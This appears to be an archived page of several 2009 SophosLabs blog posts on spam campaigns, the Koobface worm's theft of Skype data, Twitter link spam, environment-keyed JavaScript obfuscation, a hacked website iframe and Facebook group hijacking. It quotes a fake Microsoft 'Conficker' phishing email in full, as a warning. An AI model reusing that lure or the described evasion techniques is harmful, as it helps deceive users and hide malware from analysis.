SophosLabs blog

SophosLabs were today’s Macbook air winners according to the cyber criminals. We received loads of these congratulation emails on our spam traps today.  They were spamming out the malicious attachments which Sophos successfully detects as Troj/Agent-LNC.

The email was attached with a zip file called winner.zip ( Detected as Troj/SpefZp-A). Here’s the sample of the email.

The email pretends to be coming from Media Service and you can clearly see the typo in the email. All this proves that it’s a definite spam.

Sophos also proactively blocks the malware as Mal/FakeAV-AX.

Please don’t click on any such fake congratulation emails in your inbox or the junk folder. If you still ignore this warning and click on the attachment thinking you are a winner of Macbook air, you will be gifted with the malware.

Koobface started life compromising Twitter accounts. It then diversified to attack various social networking sites including Facebook, MySpace, Bebo, hi5, GeoCities, Friendster among the prominent ones.

Recently I came across what could possibly be the next iteration of Koobface, W32/Koobfa-O, which came with Skype hacking functionality and some additional promises for the future. The new variant of Koobface attacks Skype accounts on the compromised machine to get various pieces of information about the victim using the different Skype API commands. The following screenshot demonstrates a few:

W32/Koobfa-O collects information about the user such as HOMEPAGE, ABOUT, PHONE_MOBILE, PHONE_OFFICE, PHONE_HOME, CITY, COUNTRY, BIRTHDAY, FULLNAME, PSTN_BALANCE etc. The collected information is dumped into a file which is packed as a RAR archive and either emailed or uploaded to a remote server. The worm then logs on to Skype chat as the user and starts a conversation with friends online. In the body of the worm there are snippets of conversation in 18 different languages including some Asian languages. The following screenshot shows a snippet of available conversation items in English:

I initially expected that there might be some lexical analysis being done to talk somewhat intelligently with the person at the other end of the chat, but it seems the worm pastes conversation pieces fairly randomly. This will be because the worm supports conversation in 18 languages, and it is too complicated to do a lexical analysis for the different languages. It is easier to just randomly chat. The worm will also paste a link to a compromised domain in the chat conversation, visiting which will download W32/Koobfa-O.

W32/Koobfa-O also does something which promises upcoming functionality in the future.

Koobface already attacks Facebook and MySpace, so those two on the list are no big surprises. The list contains new additions: blogger.com, wikipedia.org, youtube.com, yahoo.com and google.com. The worm doesn’t do much except look to see if some information (possibly credentials) exists for these domains. But is this a promise for the future? Clearly as social networking and collaborative sites/tools multiply in number and become bigger, more malware will attempt to take advantage of them.

Starting early this morning, we have seen a major uptick in the use of Twitter links inside spam messages. Here are a few different variants of them. Most of the spam refers to online med sites although a few campaigns tout making lots of money:

Following the links will lead a user to arrive at “making-money-with-Google” or Online Pharmacy sites:

The Twitter accounts themselves appear to be legitimate and do not look to be bot-registered. They contain normal-looking tweets in the previous days and months. We’re still looking into how the accounts are compromised. Certain malware such as koobface would steal Twitter credentials. There is also the possibility of the accounts credentials being compromised through phishing.

As for regular users, it’s important now more than ever to scrutinize the links you receive through Twitter. Today these links point to spam sites. Tomorrow these links could be pointing to malware.

Do you think she’s hot? Her name’s Katya and she is my latest entry to my long list of “girlfriend-wannabe” / “potential one-night-stands”. If my mum were to find out about her, she will definitely give me a hard backhand on my head for letting such a great girl like Katya waiting.

Katya wrote me a really sweet email. However, I am appalled by her English. Let me share snippets of her declaration of love for me :)

1.   The agency of acquaintances has a contact to other agencies of acquaintances in other countries and I have received yours e-mail, therefore now I write to you.

I must get hold of her agencies of acquaintances as they do have acquaintances who are pretty young things!

2.   I very much like walks on fresh air, I very much love the nature.

She can walk on air! I’m impressed n_n

3.   I like the sea and it is pleasant to float, in the summer I like to float and sunbathe.

Floating is easy. Dead people float too.

4.   I trust in family and love, and I search for the person to the one whom I will give all heat of my heart and with that whom I will be always together,

I feel for you too girlfriend!

5.   My person, clever also has strong spirit, he is kind and magnanimous and generous, he will be do something for me, and will know, that I will be do something for him.

Yup! I do fit her checklist :D

On that I will finish my blog entry. Katya, “if I have interested you then write to me.” :)

Malware authors and software-protectionists alike go to great lengths to obfuscate and contort their code in an attempt to hide or obscure its true nature [1,2]. The assumption being that it is difficult for human or machine to make sense of the code, extending analysis time and giving the bad guys a free run.

For the most part, such obfuscations (in particular JavaScript) are relatively easy to unravel because they are static transformations [3]. The more complex encrypted forms require some form of script emulator (or your browser of choice) and a skillfully inserted alert() instead of eval(), however a new form akin to the one-time-pad concept is now being deployed.

Script obfuscated and encrypted with contextual data

Such [quasi] one-time encryptors function by generating and encrypting the content on-demand while at the same time choosing a key which is a function of the download environment, such as the referer or the last modified time. When the script is rendered it has all the necessary information to correctly decode. However when that script is submitted by the customer for analysis, the environment has long been destroyed making the script nearly impossible to decode.

Thus examining the script on Friday 13th (13/11/2009) at 11:08:23 yields (poorly) decrypted content which does not render.

Script decoded with wrong key

yet behold, on (every) 47th second of the 7th day of each month the script correctly decodes revealing its secrets - here, deciding whether to serve a (quite likely malicious) PDF, or Flash element.

Correctly decoded given context

Static offline analysis of such scripts is easily thwarted, however any scanning engine which has access to the HTTP data stream should be able to cope since it has all the relevant contextual data required at the time of rendering.

Brute-forcing aside, the only real way to tackle this problem is to use “Just in time” detection (otherwise known as on-access), failing that, NoScript remains your best protection.

Today we have spotted a batch of messages arriving in our spam systems titled “Conflicker.B Infection Alert”. The message goes like this:

Dear Microsoft Customer,

Starting 12/11/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.

To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division

The fact that the so-called antispyware program comes attached with the email is a good indication that something is not looking right.

When the attached program was executed, it did not start a “free system scan” as claimed, but instead it simply moved itself into other folders in the system and have set up itself to be automatically started on windows startup.

Not surprisingly, the attached file is detected by Sophos as Mal/FakeAV-AX and the email message has also been blocked.

This is another example of social engineering tricks employed by malware authors to capitalize on fears of the user to entice them into running malicious software.

As always with dealing with emails, think twice before running what came with the attachment.

Before everybody peruses the ‘net in search of their fish supper this cold and wet Friday night.* Stop!!

Do you have adequate protection?

For your Internet browsing?

Earlier this week SophosLabs spotted that the famous chip shop brand Harry Ramsden’s website had been haked by a malicious iframe. I codn’t believe it when I saw that the mootools.js script on the site is infected with Troj/Iframe-DF meaning that the website isn’t the plaice to visit.

The injected code is all mushed up though so the malicious script may be floundering.

The obfuscated iframe points to a haked site in Germany that when you go there redirects you to a fake Google site registered in the EU. Which triggers Troj/ObfJS-R.

I don’t want to carp on about the responsibilities of Web masters and Web hosters but they really have to protect their sites as well as tuna them up.

All this talk of fish’n'chips has made me hungry for a chip butty.

*Apologies for the puntastic tabloid style of this post but it is Friday :)

I was checking my personal Twitter feed today and saw friends posting how long they’ve been tweeting along with a link. The tweet looked something like this:

“Tweeting for # years, # months, # weeks, # day, # hours, # minutes # seconds (MM DD, YYYY) How about you? <link>

Being curious, I decided to investigate the link.

The first thing it does is ask for your screen name and shows a bunch of ads of “How to get more Twitter followers”. Ok, not the best ads, but moving on. You enter the screen name, then hit go. It looks up the name and gives an accurate date, but then it offers to tweet it for you. So you enter in your username and password. Wait a minute. That would be handing over your password to an unknown entity.

I did some initial investigation of the url. It’s only been around two months and is hosted with a fairly dodgy source, a proxy hosting service. This is a private hosting so you can’t see any info on the person/business who actually own the site. Hmmm. Usually, legit sites don’t mind having that info available. I also notice it doesn’t use the OAuth verification that many Twitter sites use to mean they are trying to be legit. Again, seems suspicious.

But how many people have willingly sacrificed their passwords by using such seemingly benign tools or links or applications? They seem totally harmless, don’t they? Like I posted in my previous blog post here there’s great value to malware authors to get that info. Now I’m not necessarily condemning this particular tool, this one may be totally innocent, but I feel compelled to warn people to not just blithely hand over their passwords. PLEASE think about what you are doing, even if it seems like it’s harmless fun.

This month’s “Patch Tuesday” includes 6 security updates - of which Microsoft has rated 3 as Critical (all remote code execution vulnerabilities) and 3 Important (two remote code execution vulnerabilities and one denial of service).

Mention-worthy updates this month include MS09-065 and MS09-068.

MS09-065 addresses several kernel vulnerabilities. The vulnerability of particular concern is related to specially crafted Embedded OpenType fonts, and could be exploited to run unauthorized code in the system context.

Most remote code execution vulnerabilities we see typically run in the user context at the same privilege level as the currently authenticated user. Now, if you’re the user this means that all your files are at risk, but the system itself is reasonably safe (unless your administrator hasn’t been adhering to best practices, and has granted you administrative privileges … in which case you’ve pretty much granted the attacker’s code access to the entire box). With this kernel-mode driver remote code execution vulnerability, the current user’s privilege level is irrelevant. It doesn’t matter how unprivileged the current user is - the unauthorized code has unfettered access to the local system. Assuming, that is, the attacker doesn’t destabilize the system and BSOD before their code runs. Kernel vulnerabilities have a habit of not just bringing down processes, but bringing down entire boxes.

MS09-068 is mention-worthy, as it addresses issues in Microsoft Word, for both the Windows AND Apple platforms. Windows users that have automatic updates configured will automatically have protection provided to them - but Apple users will have to rely on the Microsoft Office Update Utility “Microsoft AutoUpdate” or go to here, here or here, to download the relevant update.

You can find the rest of our analysis here.

And, as always, if you’ve found our vulnerability posts to be valuable, or have some suggestions for how we can better serve you, please let us know at sophosblog@sophos.com

I saw in the news today about Facebook groups being hijacked through a design flaw. When a group is created on Facebook, you have the option of it being an open group (anyone can join) or a closed group (invite only). Then there is an owner and an administrator of the group. Usually they are the same person, but you can delegate. If the owner/admin no longer wishes to be a part of the group, they can leave, but that means the group no longer has an owner. Anyone can then take ownership of the group to keep it going.

I am not going to debate whether this is a good or bad policy on the part of Facebook. What I want to talk about is the blatant hacking of the group “Control your info”. While I understand their desire to “help” hacking and defacing groups on Facebook is hardly the way to go about it.

Once they joined a group and took it over, they would post the following message there:

“This means we control a certain part of the information about you on Facebook. If we wanted we could make you appear in a bad way which could damage your image severly.

For example we could rename your group and call it something very inappropriate and nasty, like “I support pedophile’s rights”. But have no fear - we won’t. We just renamed it Control Your Info. Because this is really all we want:

Think about the safety in your social media life to the same extent you do in your real life.

Watch the videoclip for more information or check out for more tips soon!

We promise to restore your group name and leave the group by the end of next week. Don’t worry - we won’t mess anything up.

Best regards”

What they are doing really is no different to a hacker gaining control of a group and defacing it. Two wrongs do not make it right. While this group may think they are “helping” they are in fact making themselves look just as bad as a black hat. Think about the hacker that “Rickrolled” a bunch of iPhones that Graham posted about. Does it really make it right to hack into computers, phones, and websites to “try to raise security issues”? Not in our books.